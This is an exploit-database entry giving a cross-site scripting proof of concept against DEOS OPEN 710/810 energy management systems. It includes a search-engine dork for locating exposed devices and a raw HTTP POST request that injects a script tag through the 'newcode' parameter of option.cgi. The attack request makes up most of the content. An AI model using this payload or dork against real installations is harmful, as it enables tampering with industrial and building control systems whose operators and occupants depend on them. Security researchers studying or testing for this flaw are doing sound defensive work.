Exploit for DEOS AG OPEN 710/810 Cross Site Scripting

Name: Exploit for DEOS AG OPEN 710/810 Cross Site Scripting
Rating: 5 (236 reviews)

2022-03-09 | CVSS -0.4

## https://sploitus.com/exploit?id=PACKETSTORM:166247
# Title: DEOS control systems GmbH - OPEN 710/810 EMS > Cross Site Scripting Vulnerability  
# Dork: app:"DEOS AG OPEN EMS System ics device httpd"  
# Vendor page: https://www.deos-ag.com/en/  
# Exploit Author: n4pst3r  
# Tested on: Debian   
  
  
  
POST /cgi-bin/option.cgi?function=2 HTTP/1.1  
Content-Length: 83  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/cgi-bin/cosmobdf.cgi?function=%271&session=0&grafik=0  
Host: localhost  
Connection: Keep-alive  
Accept-Encoding: gzip;deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML; like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*  
  
devcode_form=&lastcode_form=&newcode=94102_</script><script>prompt(1337)</script>